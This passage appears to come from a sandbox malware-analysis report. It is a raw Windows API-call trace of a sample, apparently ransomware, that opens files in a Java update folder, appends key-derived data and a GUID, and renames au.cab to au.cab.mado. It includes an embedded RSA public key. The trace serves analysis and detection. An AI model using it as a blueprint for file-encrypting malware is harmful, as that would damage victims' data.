wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3217c0 [0206.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.624] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\") returned="AU\\" [0206.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3218d0 [0206.624] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0206.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2df0 [0206.624] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0206.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.624] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0206.624] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87208 [0206.625] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0206.625] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.625] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.625] PathFindFileNameW (pszPath="") returned="" [0206.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3218d0 [0206.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.626] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.626] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x8e062, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.cab", cAlternateFileName="")) returned 1 [0206.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3218d0 [0206.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d64f0 [0206.626] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned=".cab" [0206.626] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.627] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=581730) returned 1 [0206.627] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.629] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8e03c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.629] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.631] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x25805, lpOverlapped=0x0) returned 1 [0206.633] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.633] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.633] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.633] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3218d0) returned 1 [0206.634] CryptCreateHash (in: hProv=0x3218d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.634] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.634] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.634] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.634] GetLastError () returned 0x0 [0206.634] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.634] CryptReleaseContext (hProv=0x3218d0, dwFlags=0x0) returned 1 [0206.634] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.634] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.635] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.636] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0206.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.636] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8e062, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.637] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0206.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0206.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0206.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0206.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0206.637] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0206.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0206.637] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.637] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.637] CloseHandle (hObject=0x63c) returned 1 [0206.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef4b8 [0206.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b7b950 [0206.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef4b8 | out: hHeap=0x2c0000) returned 1 [0206.645] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.mado")) returned 1 [0206.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.647] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d64f0 | out: hHeap=0x2c0000) returned 1 [0206.648] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.msi", cAlternateFileName="")) returned 1 [0206.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3218d0 [0206.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d64f0 [0206.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3218d0 | out: hHeap=0x2c0000) returned 1 [0206.648] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned=".msi" [0206.648] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.648] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=185344) returned 1 [0206.648] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.651] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x2d3da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.651] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.652] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.652] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x25805, lpOverlapped=0x0) returned 1 [0206.654] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.654] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.654] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.654] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3218d0) returned 1 [0206.655] CryptCreateHash (in: hProv=0x3218d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.655] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.655] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.655] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.655] GetLastError () returned 0x0 [0206.655] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.655] CryptReleaseContext (hProv=0x3218d0, dwFlags=0x0) returned 1 [0206.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.655] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.655] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.655] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25810) returned 0x3b87c98 [0206.656] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87250 [0206.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cb0 [0206.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87298 [0206.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cc8 [0206.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cf8 [0206.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d40 [0206.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d10 [0206.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0206.656] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cf8 | out: hHeap=0x2c0000) returned 1 [0206.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d10 | out: hHeap=0x2c0000) returned 1 [0206.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d40 | out: hHeap=0x2c0000) returned 1 [0206.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d40 [0206.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0206.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79d10 [0206.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0206.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79cf8 [0206.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6ec98 [0206.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6edb0 [0206.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0206.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0206.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d10 | out: hHeap=0x2c0000) returned 1 [0206.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cf8 | out: hHeap=0x2c0000) returned 1 [0206.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d40 | out: hHeap=0x2c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.658] GetCurrentThreadId () returned 0x600 [0206.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b816a8 [0206.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b7b268 [0206.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3218d0 [0206.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b817b0 [0206.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.658] GetCurrentThreadId () returned 0x600 [0206.658] 